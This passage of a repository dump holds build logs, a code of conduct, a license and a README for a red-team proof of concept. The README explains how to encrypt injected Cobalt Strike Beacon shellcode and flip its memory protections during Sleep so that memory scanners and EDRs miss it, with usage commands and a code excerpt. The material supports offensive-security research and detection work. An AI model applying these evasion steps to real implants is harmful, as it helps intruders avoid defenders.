MaxStackSize,\r\n\tPVOID pAttrListOut\r\n);"
  },
  {
    "path": "chapter4-demo3/demo1/x64/Debug/demo1.exe.recipe",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n  <ProjectOutputs>\r\n    <ProjectOutput>\r\n      <FullPath>E:\\last\\demo1\\x64\\Debug\\demo1.exe</FullPath>\r\n    </ProjectOutput>\r\n  </ProjectOutputs>\r\n  <ContentFiles />\r\n  <SatelliteDlls />\r\n  <NonRecipeFileRefs />\r\n</Project>"
  },
  {
    "path": "chapter4-demo3/demo1/x64/Debug/demo1.log",
    "content": "﻿  demo1.vcxproj -> E:\\last\\demo1\\x64\\Debug\\demo1.exe\r\n"
  },
  {
    "path": "chapter4-demo3/demo1/x64/Debug/demo1.tlog/demo1.lastbuildstate",
    "content": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nDebug|x64|E:\\last\\demo1\\|\r\n"
  },
  {
    "path": "chapter4-demo3/demo1/x64/Release/demo1.exe.recipe",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n  <ProjectOutputs>\r\n    <ProjectOutput>\r\n      <FullPath>E:\\last\\demo3\\x64\\Release\\demo1.exe</FullPath>\r\n    </ProjectOutput>\r\n  </ProjectOutputs>\r\n  <ContentFiles />\r\n  <SatelliteDlls />\r\n  <NonRecipeFileRefs />\r\n</Project>"
  },
  {
    "path": "chapter4-demo3/demo1/x64/Release/demo1.log",
    "content": "﻿  demo1.cpp\r\nE:\\last\\demo3\\demo1\\header.h(6,67): warning C4312: “类型强制转换”: 从“unsigned int”转换到更大的“void *”\r\nE:\\last\\demo3\\demo1\\demo1.cpp(29,10): warning C4244: “=”: 从“SIZE_T”转换到“DWORD”，可能丢失数据\r\nE:\\last\\demo3\\demo1\\demo1.cpp(34,28): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”，可能丢失数据\r\nE:\\last\\demo3\\demo1\\demo1.cpp(39,16): warning C4018: “<”: 有符号/无符号不匹配\r\nE:\\last\\demo3\\demo1\\demo1.cpp(386,32): error C2026: 字符串太大，已截断尾部字符\r\nE:\\last\\demo3\\demo1\\demo1.cpp(411,58): warning C4267: “初始化”: 从“size_t”转换到“DWORD”，可能丢失数据\r\nE:\\last\\demo3\\demo1\\demo1.cpp(412,16): warning C4244: “初始化”: 从“SIZE_T”转换到“DWORD”，可能丢失数据\r\nE:\\last\\demo3\\demo1\\demo1.cpp(417,3): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”，可能丢失数据\r\nE:\\last\\demo3\\demo1\\demo1.cpp(416,3): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”，可能丢失数据\r\nE:\\last\\demo3\\demo1\\demo1.cpp(425,20): warning C4018: “<=”: 有符号/无符号不匹配\r\nE:\\last\\demo3\\demo1\\demo1.cpp(452,20): warning C4018: “<”: 有符号/无符号不匹配\r\n"
  },
  {
    "path": "chapter4-demo3/demo1/x64/Release/demo1.tlog/demo1.lastbuildstate",
    "content": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nRelease|x64|E:\\last\\demo3\\|\r\n"
  },
  {
    "path": "chapter4-demo3/demo1/x64/Release/demo1.tlog/unsuccessfulbuild",
    "content": ""
  },
  {
    "path": "chapter4-demo3/demo1.sln",
    "content": "﻿\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 16\r\nVisualStudioVersion = 16.0.28729.10\r\nMinimumVisualStudioVersion = 10.0.40219.1\r\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"demo1\", \"demo1\\demo1.vcxproj\", \"{1876F365-2DEC-42C9-B80E-B631B26FCAD8}\"\r\nEndProject\r\nGlobal\r\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\r\n\t\tDebug|x64 = Debug|x64\r\n\t\tDebug|x86 = Debug|x86\r\n\t\tRelease|x64 = Release|x64\r\n\t\tRelease|x86 = Release|x86\r\n\tEndGlobalSection\r\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x64.ActiveCfg = Debug|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x64.Build.0 = Debug|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x86.ActiveCfg = Debug|Win32\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Debug|x86.Build.0 = Debug|Win32\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x64.ActiveCfg = Release|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x64.Build.0 = Release|x64\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x86.ActiveCfg = Release|Win32\r\n\t\t{1876F365-2DEC-42C9-B80E-B631B26FCAD8}.Release|x86.Build.0 = Release|Win32\r\n\tEndGlobalSection\r\n\tGlobalSection(SolutionProperties) = preSolution\r\n\t\tHideSolutionNode = FALSE\r\n\tEndGlobalSection\r\n\tGlobalSection(ExtensibilityGlobals) = postSolution\r\n\t\tSolutionGuid = {1F8E67EA-F3B7-42DD-84B6-2CD2AC0305B7}\r\n\tEndGlobalSection\r\nEndGlobal\r\n"
  },
  {
    "path": "chapter4-demo4/CODE_OF_CONDUCT.md",
    "content": "# Contributor Covenant Code of Conduct\n\n## Our Pledge\n\nWe as members, contributors, and leaders pledge to make participation in our\ncommunity a harassment-free experience for everyone, regardless of age, body\nsize, visible or invisible disability, ethnicity, sex characteristics, gender\nidentity and expression, level of experience, education, socio-economic status,\nnationality, personal appearance, race, religion, or sexual identity\nand orientation.\n\nWe pledge to act and interact in ways that contribute to an open, welcoming,\ndiverse, inclusive, and healthy community.\n\n## Our Standards\n\nExamples of behavior that contributes to a positive environment for our\ncommunity include:\n\n* Demonstrating empathy and kindness toward other people\n* Being respectful of differing opinions, viewpoints, and experiences\n* Giving and gracefully accepting constructive feedback\n* Accepting responsibility and apologizing to those affected by our mistakes,\n  and learning from the experience\n* Focusing on what is best not just for us as individuals, but for the\n  overall community\n\nExamples of unacceptable behavior include:\n\n* The use of sexualized language or imagery, and sexual attention or\n  advances of any kind\n* Trolling, insulting or derogatory comments, and personal or political attacks\n* Public or private harassment\n* Publishing others' private information, such as a physical or email\n  address, without their explicit permission\n* Other conduct which could reasonably be considered inappropriate in a\n  professional setting\n\n## Enforcement Responsibilities\n\nCommunity leaders are responsible for clarifying and enforcing our standards of\nacceptable behavior and will take appropriate and fair corrective action in\nresponse to any behavior that they deem inappropriate, threatening, offensive,\nor harmful.\n\nCommunity leaders have the right and responsibility to remove, edit, or reject\ncomments, commits, code, wiki edits, issues, 
and other contributions that are\nnot aligned to this Code of Conduct, and will communicate reasons for moderation\ndecisions when appropriate.\n\n## Scope\n\nThis Code of Conduct applies within all community spaces, and also applies when\nan individual is officially representing the community in public spaces.\nExamples of representing our community include using an official e-mail address,\nposting via an official social media account, or acting as an appointed\nrepresentative at an online or offline event.\n\n## Enforcement\n\nInstances of abusive, harassing, or otherwise unacceptable behavior may be\nreported to the community leaders responsible for enforcement at\nMariusz Banach (mgeeky, @mariuszbit, mb@binary-offensive.com).\nAll complaints will be reviewed and investigated promptly and fairly.\n\nAll community leaders are obligated to respect the privacy and security of the\nreporter of any incident.\n\n## Enforcement Guidelines\n\nCommunity leaders will follow these Community Impact Guidelines in determining\nthe consequences for any action they deem in violation of this Code of Conduct:\n\n### 1. Correction\n\n**Community Impact**: Use of inappropriate language or other behavior deemed\nunprofessional or unwelcome in the community.\n\n**Consequence**: A private, written warning from community leaders, providing\nclarity around the nature of the violation and an explanation of why the\nbehavior was inappropriate. A public apology may be requested.\n\n### 2. Warning\n\n**Community Impact**: A violation through a single incident or series\nof actions.\n\n**Consequence**: A warning with consequences for continued behavior. No\ninteraction with the people involved, including unsolicited interaction with\nthose enforcing the Code of Conduct, for a specified period of time. This\nincludes avoiding interactions in community spaces as well as external channels\nlike social media. Violating these terms may lead to a temporary or\npermanent ban.\n\n### 3. 
Temporary Ban\n\n**Community Impact**: A serious violation of community standards, including\nsustained inappropriate behavior.\n\n**Consequence**: A temporary ban from any sort of interaction or public\ncommunication with the community for a specified period of time. No public or\nprivate interaction with the people involved, including unsolicited interaction\nwith those enforcing the Code of Conduct, is allowed during this period.\nViolating these terms may lead to a permanent ban.\n\n### 4. Permanent Ban\n\n**Community Impact**: Demonstrating a pattern of violation of community\nstandards, including sustained inappropriate behavior,  harassment of an\nindividual, or aggression toward or disparagement of classes of individuals.\n\n**Consequence**: A permanent ban from any sort of public interaction within\nthe community.\n\n## Attribution\n\nThis Code of Conduct is adapted from the [Contributor Covenant][homepage],\nversion 2.0, available at\nhttps://www.contributor-covenant.org/version/2/0/code_of_conduct.html.\n\nCommunity Impact Guidelines were inspired by [Mozilla's code of conduct\nenforcement ladder](https://github.com/mozilla/diversity).\n\n[homepage]: https://www.contributor-covenant.org\n\nFor answers to common questions about this code of conduct, see the FAQ at\nhttps://www.contributor-covenant.org/faq. Translations are available at\nhttps://www.contributor-covenant.org/translations.\n"
  },
  {
    "path": "chapter4-demo4/LICENSE.txt",
    "content": "MIT License\n\nCopyright (c) 2021 Mariusz Banach (mgeeky, <mb [at] binary-offensive.com>)\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n"
  },
  {
    "path": "chapter4-demo4/README.md",
    "content": "# Shellcode Fluctuation PoC\n\nA PoC implementation for another in-memory evasion technique that cyclically encrypts and decrypts shellcode's contents to then make it fluctuate between `RW` (or `NoAccess`) and `RX` memory protection.\nWhen our shellcode resides in `RW` or `NoAccess` memory pages, scanners such as [`Moneta`](https://github.com/forrest-orr/moneta) or [`pe-sieve`](https://github.com/hasherezade/pe-sieve) will be unable to track it down and dump it for further analysis.\n\n## Intro\n\nAfter releasing [ThreadStackSpoofer](https://github.com/mgeeky/ThreadStackSpoofer) I've received a few questions about the following README's point:\n\n> Change your Beacon's memory pages protection to RW (from RX/RWX) and encrypt their contents before sleeping (that could evade scanners such as Moneta or pe-sieve)\n\nBeforehand I was pretty sure the community already knew how to encrypt/decrypt their payloads and flip their memory protections to simply evade memory scanners looking for anomalous executable regions.\nQuestions proved otherwise, so I decided to release this unweaponized PoC to document yet another evasion strategy and offer a sample implementation for the community to work with.\n\nThis PoC is a demonstration of a rather simple technique, already known to the offensive community (so I'm not bringing anything new here really), in the hope of disclosing the secrecy behind the magic shown by some commercial frameworks that demonstrate their evasion capabilities targeting both aforementioned memory scanners.\n\n\n**Here's a comparison when fluctuating to RW** (another option is to fluctuate to `PAGE_NOACCESS` - described below):\n\n1. Beacon not encrypted\n2. 
**Beacon encrypted** (_fluctuating_)\n\n![comparison](images/comparison.png)\n\n\nThis implementation, along with my [ThreadStackSpoofer](https://github.com/mgeeky/ThreadStackSpoofer), brings the Offensive Security community sample implementations to catch up on the offering made by commercial C2 products, so that we can do no worse in our Red Team toolings. 💪\n\n---\n\n## How does it work?\n\nThis program performs shellcode self-injection (roughly via the classic `VirtualAlloc` + `memcpy` + `CreateThread`). \nWhen the shellcode runs (this implementation specifically targets Cobalt Strike Beacon implants), a Windows function, `kernel32!Sleep`, is hooked to intercept the moment when Beacon falls asleep. \nWhenever the hooked `MySleep` function gets invoked, it will locate the shellcode's memory allocation boundaries, flip their protection to `RW` and `xor32` all the bytes stored there. \nAfter the expected amount of time has elapsed and control returns to our `MySleep` handler, we decrypt the shellcode's data and flip the protection back to `RX`.\n\n### Fluctuation to `PAGE_READWRITE` works as follows\n\n1. Read shellcode's contents from file.\n2. Hook `kernel32!Sleep` pointing back to our callback.\n3. Inject and launch shellcode via `VirtualAlloc` + `memcpy` + `CreateThread`. Contrary to what we had in `ThreadStackSpoofer`, here we're not hooking anything in ntdll to launch our shellcode but rather jump to it from our own function. This attempts to avoid leaving simple IOCs in memory pointing at modified ntdll memory.\n4. As soon as Beacon attempts to sleep, our `MySleep` callback gets invoked.\n5. Beacon's memory allocation gets encrypted and its protection flipped to `RW`.\n6. We then unhook the original `kernel32!Sleep` to avoid leaving a simple IOC in memory indicating that `Sleep` has been trampolined (in-line hooked).\n7. A call to the original `::Sleep` is made to let the Beacon sleep while waiting for further communication.\n8. 
After Sleep is finished, we decrypt our shellcode's data, flip its memory protection back to `RX` and then re-hook `kernel32!Sleep` to ensure interception of the subsequent sleep.\n\n### Fluctuation to `PAGE_NOACCESS` works as follows\n\n1. Read shellcode's contents from file.\n2. Hook `kernel32!Sleep` pointing back to our callback.\n3. Inject and launch shellcode via `VirtualAlloc` + `memcpy` + `CreateThread` ...\n4. Initialize a Vectored Exception Handler (VEH) to set up our own handler that will catch _Access Violation_ exceptions.\n5. As soon as Beacon attempts to sleep, our `MySleep` callback gets invoked.\n6. Beacon's memory allocation gets encrypted and its protection flipped to `PAGE_NOACCESS`.\n7. We then unhook the original `kernel32!Sleep` to avoid leaving a simple IOC in memory indicating that `Sleep` has been trampolined (in-line hooked).\n8. A call to the original `::Sleep` is made to let the Beacon sleep while waiting for further communication.\n9. After Sleep is finished, we re-hook `kernel32!Sleep` to ensure interception of the subsequent sleep.\n10. The shellcode then attempts to resume its execution, which results in an Access Violation being thrown since its pages are marked NoAccess.\n11. Our VEH handler catches the exception, decrypts and flips memory protections back to `RX`, and the shellcode is resumed.\n\n---\n\n### It's not a novel technique\n\nThe technique is not brand new, nothing that I've devised myself. It is merely an implementation showing the concept and its practical utilisation to let our Offensive Security community catch up on the offering made by commercial C2 frameworks. 
\n\nActually, I was introduced to the idea of flipping shellcode's memory protection a couple of years back through the work of [**Josh Lospinoso**](https://github.com/JLospinoso) in his amazing [Gargoyle](https://github.com/JLospinoso/gargoyle).\n\nHere's more background:\n- [gargoyle, a memory scanning evasion technique](https://lospi.net/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html)\n- [Bypassing Memory Scanners with Cobalt Strike and Gargoyle](https://labs.f-secure.com/blog/experimenting-bypassing-memory-scanners-with-cobalt-strike-and-gargoyle/)\n\n**Gargoyle** takes the concept of self-aware and self-fluctuating shellcode a step further, by leveraging a ROP sequence calling out to `VirtualProtect`. \nHowever impressive the technique is, it's equally hard to leverage it with Cobalt Strike's Beacon without having to kill its thread and keep re-initializing Beacon while in memory.\n\nThat's far from perfect; however, since we already operate from the grounds of our own self-injection loader process, we're able to do whatever we want with the environment in which the shellcode operates and hide it however we like. This technique (and the previous one, [ThreadStackSpoofer](https://github.com/mgeeky/ThreadStackSpoofer)) shows the advantages of running our shellcodes this way.\n\nThe implementation of fluctuating to `PAGE_NOACCESS` is inspired by [ORCA666](https://github.com/ORCA666)'s work presented in his https://github.com/ORCA666/0x41 injector.\nHe showed that:\n\n1. we can initialize a vectored exception handler (VEH), \n2. flip shellcode's pages to no-access\n3. and then catch Access Violation exceptions that will occur as soon as the shellcode wants to resume its execution, and decrypt + flip its memory pages back to Read+Execute.\n\nThis implementation includes this idea, available with option `2` in `<fluctuate>`. 
\nBe sure to check out his other projects as well.\n\n---\n\n## Demo\n\nThe tool `ShellcodeFluctuation` accepts two parameters: the first being the path to the shellcode and the second a modifier of our functionality.\n\n```\nUsage: ShellcodeFluctuation.exe <shellcode> <fluctuate>\n<fluctuate>:\n        -1 - Read shellcode but dont inject it. Run in an infinite loop.\n        0 - Inject the shellcode but don't hook kernel32!Sleep and don't encrypt anything\n        1 - Inject shellcode and start fluctuating its memory with standard PAGE_READWRITE.\n        2 - Inject shellcode and start fluctuating its memory with ORCA666's PAGE_NOACCESS.\n```\n\n### Moneta (seemingly) False Positive\n\n```\nC:\\> ShellcodeFluctuation.exe beacon64.bin -1\n```\n\nSo firstly we'll see what the `Moneta64` scanner thinks about a process that does nothing dodgy and simply runs an infinite loop:\n\n![moneta false positive](images/false-positive.png)\n\nAs we can see there's some **false positive** (at least that's how I consider it) allegedly detecting `Mismatching PEB module` / `Phantom image`. \nThe memory boundaries point at the `ShellcodeFluctuate.exe` module itself and could indicate that this module, despite being of `MEM_IMAGE` type, is not linked in the process' PEB - which is unusual and sounds rather odd.\nThe reason for this IOC is not known to me and I didn't attempt to understand it better, yet it isn't something we should be concerned about really.\n\nIf anyone knows what the reason for this detection is, I'd be very curious to hear! Please do reach out.\n\n### Not Encrypted Beacon\n\n```\nC:\\> ShellcodeFluctuation.exe beacon64.bin 0\n```\n\nThe second use case presents Memory IOCs of a Beacon operating within our process, which does not utilise any sort of customised `Artifact Kits` or `User-Defined Reflective Loaders` (such as my [`ElusiveMice`](https://github.com/mgeeky/ElusiveMice)), nor any initial actions that would spoil our results. 
\n\n![moneta not encrypted](images/not-encrypted.png)\n\nWe can see that `Moneta64` correctly recognizes `Abnormal private executable memory` pointing at the location where our shellcode resides. \nThat's a really strong Memory IOC exposing our shellcode to getting dumped and analysed by automated scanners. Not cool.\n\n### Encrypted Beacon with RW protections\n\n```\nC:\\> ShellcodeFluctuation.exe beacon64.bin 1\n```\n\nNow the third, and from the perspective of this implementation the most interesting, use case: the _fluctuating_ Beacon.\n\n![moneta encrypted](images/encrypted.png)\n\nApart from the first IOC, considered somewhat of a _false positive_, we see a new one indicating that `kernel32.dll` memory was modified. \nHowever, there is no `Abnormal private executable memory` IOC this time. Our fluctuation (repeated encryption/decryption and memory protection flipping) is active.\n\nAnd for the record, `pe-sieve` also detects an implanted PE when used with the `/data 3` option (unless this option is given, no detection will be made):\n\n![pe-sieve](images/pe-sieve3.png)\n\nMy current assumption is that PE-Sieve is picking up on the same traits that Moneta does (described below in _Modified code in kernel32.dll_) - the fact that a PE mapped module has a non-empty working set, which is evidence of code injection of some sort.\nThat is labeled as _Implanted PE_ / _Implanted_. If that's the case, the conclusion is similar to Moneta's observation. I don't think we should care that much about that IOC detection-wise.\n\nCurrently I can think of no better option to intercept the shellcode's execution in the middle (now speaking of Cobalt Strike) other than to hook `kernel32!Sleep`. Thus, we are bound to leave these sorts of IOCs.\n\nBut hey, still none of the bytes differ compared to what is lying out there on the filesystem (`C:\\Windows\\System32\\kernel32.dll`) and no function is hooked, so what's the deal? 
😉\n\n\n\n### Encrypted Beacon with PAGE_NOACCESS protections\n\n```\nC:\\> ShellcodeFluctuation.exe beacon64.bin 2\n```\n\n![no-access](images/no-access1.png)\n\nThat will effectively cause the shellcode to fluctuate between `RX` and `NA` pages.\n\nAt the moment I'm not sure of the benefits of flipping into `PAGE_NOACCESS` instead of `PAGE_READWRITE`. \n\n\n### Modified code in kernel32.dll\n\nSo what about that modified `kernel32` IOC?\n\nNow, let us attempt to get to the bottom of this IOC and see what's the deal here.\n\nFirstly, we'll dump the mentioned memory region - the `.text` (code) section of `kernel32.dll`. Let us use `ProcessHacker` for that purpose, to utilise publicly known and stable tooling:\n\n![dump-kernel](images/dump-kernel.png)\n\nWe dump the code section of the allegedly modified kernel32 and then do the same for the kernel32 running in a process that did not modify that area.\n\nHaving acquired two dumps, we can then compare them byte-wise (using my [expdevBadChars](https://github.com/mgeeky/expdevBadChars)) to look for any inconsistencies:\n\n![bindiff](images/bindiff0.png)\n\nJust to see that they match one another. Clearly there isn't a single byte modified in `kernel32.dll`, and the reason for that is that we're unhooking `kernel32!Sleep` before calling it:\n\n`main.cpp:31:`\n```\n    HookTrampolineBuffers buffers = { 0 };\n    buffers.originalBytes = g_hookedSleep.sleepStub;\n    buffers.originalBytesSize = sizeof(g_hookedSleep.sleepStub);\n\n    //\n    // Unhook kernel32!Sleep to evade hooked Sleep IOC. \n    // We leverage the fact that the return address left on the stack will make the thread\n    // get back to our handler anyway.\n    //\n    fastTrampoline(false, (BYTE*)::Sleep, &MySleep, &buffers);\n\n    // Perform sleep emulating originally hooked functionality.\n    ::Sleep(dwMilliseconds);\n```\n\nSo what's causing the IOC to be triggered? 
Let us inspect `Moneta` more closely:\n\n![moneta](images/moneta.png)\n\nBreaking into Moneta's `Ioc.cpp` just around line 104, where it reports the `MODIFIED_CODE` IOC, we can modify the code a little to better expose the exact moment when it analyses the kernel32 pool.\nNow:\n\n1. A check is made to ensure that kernel32's region is executable. We see that in fact that region is executable: `a = true`\n2. The amount of that module's private memory is acquired. Here we see that `kernel32` has `b = 0x1000` private bytes. How come? There should be `0` of them.\n3. If an executable allocation has more than 0 bytes of private memory (`a && b`), the IOC is reported\n4. And that's proof we were examining kernel32 at that time.\n\nWhen the Windows Image Loader maps a DLL module into the process' memory space, the underlying memory pages will be labeled as `MEM_MAPPED` or `MEM_IMAGE` depending on the scenario. \nWhenever we modify even a single byte of the `MEM_MAPPED`/`MEM_IMAGE` allocation, the system will separate a single memory page (assuming we modified less than `PAGE_SIZE` bytes and did not cross a page boundary) to indicate a fragment that does not map back to the original image.\n\nThis observation is then utilised as an IOC - an image should not have `MEM_PRIVATE` allocations within its memory region (inside of it) because that would indicate that some bytes were once modified within that region. Moneta is correctly picking up on code modification even though the bytes matched the original module's bytes at the time of comparison.\n\nFor a comprehensive explanation of how Moneta, process injection implementations and the related IOCs work under the hood, read the following top quality articles by **Forrest Orr**:\n\n1. [Masking Malicious Memory Artifacts – Part I: Phantom DLL Hollowing](https://www.forrest-orr.net/post/malicious-memory-artifacts-part-i-dll-hollowing)\n2. 
[Masking Malicious Memory Artifacts – Part II: Blending in with False Positives](https://www.forrest-orr.net/post/masking-malicious-memory-artifacts-part-ii-insights-from-moneta)\n3. [Masking Malicious Memory Artifacts – Part III: Bypassing Defensive Scanners](https://www.cyberark.com/resources/threat-research-blog/masking-malicious-memory-artifacts-part-iii-bypassing-defensive-scanners)\n\nThat's truly outstanding research and documentation done by Forrest, great work pal!\n\nEspecially the second article outlines the justification for this detection, as we read what Forrest teaches us:\n\n> In the event that the module had been legitimately loaded and added to the PEB, the shellcode implant would still have been detected due to the 0x1000 bytes (1 page) of memory privately mapped into the address space and retrieved by Moneta by querying its working set - resulting in a modified code IOC as seen above.\n\n\nTo summarise, we're leaving an IOC behind, but should we be worried about that?\nEven if there's an IOC, there are no stolen bytes visible, so there is no immediate reference pointing back to our shellcode or distinguishing our shellcode's technique from others.\n\nLong story short - we shouldn't really be worried about that IOC. :-)\n\n\n### But commercial frameworks leave no IOCs\n\nOne could say that this implementation is far from perfect because it still leaves IOCs behind, while the commercial products show they don't have similar traits.\n\nWhen that argument is on the table I need to point out that the commercial frameworks have complete control over the source code of their implants and shellcode loaders, and thus can nicely integrate one with the other to avoid the necessity of hooking and hacking around their shellcode themselves. Here, we need to hook `kernel32!Sleep` to intercept Cobalt Strike's Beacon execution just before it falls asleep in order to kick off our housekeeping. 
If there was a better mechanism for us to kick in without having to hook Sleep - that would be perfect.\n\nHowever, although there is a notion of a [_Sleep Mask_](https://www.cobaltstrike.com/help-sleep-mask-kit) introduced to Cobalt Strike, its size restriction to hundreds of bytes makes us totally unable to introduce this logic into the mask itself (otherwise we'd be able to avoid hooking `Sleep` as well, leaving no IOCs just like commercial products do).\n\nAnother argument might be that commercial frameworks integrate these sorts of logic into their _Reflective Loaders_, whereas here we instead leave it in the EXE harness.\nThat's true, but the reason for such a decision is twofold:\n\n1. I need to be really careful with releasing this kind of technology to avoid the risk of helping weaponize real-world criminals with an implementation that will haunt us back with another Petya. For that reason I decided to skip some of the gory details that I use in my professional tooling used to deliver commercial, contracted Adversary Simulation exercises. Giving out the seed will hopefully be met with community professionals able to grow the concept in their own toolings, assuming they have the appropriate skills.\n\n2. I'd far prefer to move this entire logic to the [_User-Defined Reflective Loader_](https://www.cobaltstrike.com/help-user-defined-reflective-loader) of Cobalt Strike, giving Red Team groups elevated chances in their delivery phase. But firstly, see point (1); secondly, that technology is currently limited to 5 KB in size for RDLLs, making me completely unable to implement it there as well. 
For those of us who build custom C2 & implants for in-house Adversary Simulation engagements - they have now received a sample implementation that will surely help them embellish their tooling accordingly.\n\n---\n\n## How do I use it?\n\nLook at the code and its implementation, understand the concept and re-implement it within your own Shellcode Loaders that you utilise to deliver your Red Team engagements.\nThis is yet another technique for advanced in-memory evasion that increases your Team's chances of not getting caught by Anti-Viruses, EDRs and Malware Analysts taking a look at your implants.\n\nWhile developing your advanced shellcode loader, you might also want to implement:\n\n- **Process Heap Encryption** - take inspiration from this blog post: [Hook Heaps and Live Free](https://www.arashparsa.com/hook-heaps-and-live-free/) - which can let you evade Beacon configuration extractors like [`BeaconEye`](https://github.com/CCob/BeaconEye)\n- [**Spoof your thread's call stack**](https://github.com/mgeeky/ThreadStackSpoofer) before sleeping (that could evade scanners attempting to examine the process' threads and their call stacks in an attempt to hunt for `MEM_PRIVATE` memory allocations referenced by these threads)\n- **Clear out any leftovers from the Reflective Loader** to avoid in-memory signature detections\n- **Unhook everything you might have hooked** (such as AMSI, ETW, WLDP) before sleeping and then re-hook afterwards.\n\n---\n\n## Example run\n\nUse case:\n\n```\nUsage: ShellcodeFluctuation.exe <shellcode> <fluctuate>\n<fluctuate>:\n        -1 - Read shellcode but dont inject it. 
Run in an infinite loop.\n        0 - Inject the shellcode but don't hook kernel32!Sleep and don't encrypt anything\n        1 - Inject shellcode and start fluctuating its memory with standard PAGE_READWRITE.\n        2 - Inject shellcode and start fluctuating its memory with ORCA666's PAGE_NOACCESS.\n```\n\nWhere:\n- `<shellcode>` is a path to the shellcode file\n- `<fluctuate>`, as described above, takes `-1`, `0`, `1` or `2`\n\n\nExample run that spoofs beacon's thread call stack:\n\n```\nC:\\> ShellcodeFluctuation.exe ..\\..\\tests\\beacon64.bin 1\n\n[.] Reading shellcode bytes...\n[.] Hooking kernel32!Sleep...\n[.] Injecting shellcode...\n[+] Shellcode is now running. PID = 9456\n[+] Fluctuation initialized.\n    Shellcode resides at 0x000002210C091000 and occupies 176128 bytes. XOR32 key: 0x1e602f0d\n[>] Flipped to RW. Encoding...\n\n===> MySleep(5000)\n\n[.] Decoding...\n[>] Flipped to RX.\n[>] Flipped to RW. Encoding...\n\n===> MySleep(5000)\n```\n\n---\n\n## Word of caution\n\nIf you plan on adding this functionality to your own shellcode loaders / toolings be sure to **AVOID** unhooking `kernel32.dll`.\nAn attempt to unhook `kernel32` will restore the original `Sleep` functionality, preventing our callback from being called.\nIf our callback is not called, the thread will be unable to spoof its own call stack by itself.\n\nIf that's what you want to have, then you might need to run another, watchdog thread, making sure that the Beacon's thread will get spoofed whenever it sleeps.\n\nIf you're using Cobalt Strike and the `unhook-bof` BOF by Raphael Mudge, be sure to check out my [Pull Request](https://github.com/Cobalt-Strike/unhook-bof/pull/1) that adds an optional parameter to the BOF specifying libraries that should not be unhooked.\n\nThis way you can maintain your hooks in kernel32:\n\n```\nbeacon> unhook kernel32\n[*] Running unhook.\n    Will skip these modules: wmp.dll, kernel32.dll\n[+] host called home, sent: 9475 bytes\n[+] received output:\nntdll.dll          
  <.text>\nUnhook is done.\n```\n\n[Modified `unhook-bof` with option to ignore specified modules](https://github.com/mgeeky/unhook-bof)\n\n---\n\n## Final remark\n\nThis PoC was designed to work with Cobalt Strike's Beacon shellcodes. The Beacon is known to call out to `kernel32!Sleep` to await further instructions from its C2. \nThis loader leverages that fact by hooking `Sleep` in order to perform its housekeeping. \n\nThis implementation might not work with other shellcodes on the market (such as _Meterpreter_) if they don't use `Sleep` to cool down. \nSince this is merely a _Proof of Concept_ showing the technique, I don't intend on adding support for any other C2 framework.\n\nWhen you understand the concept, surely you'll be able to translate it into your shellcode requirements and adapt the solution to your advantage.\n\nPlease do not open Github issues related to \"this code doesn't work with XYZ shellcode\", they'll be closed immediately.\n\n---\n\n### ☕ Show Support ☕\n\nThis and other projects are the outcome of sleepless nights and **plenty of hard work**. If you like what I do and appreciate that I always give back to the community,\n[Consider buying me a coffee](https://github.com/sponsors/mgeeky) _(or better a beer)_ just to say thank you! 💪 \n\n---\n\n## Author\n\n```   \n   Mariusz Banach / mgeeky, 21\n   <mb [at] binary-offensive.com>\n   (https://github.com/mgeeky)\n```\n"
  },
  {
    "path": "chapter4-demo4/ShellcodeFluctuation/ShellcodeFluctuation.vcxproj",
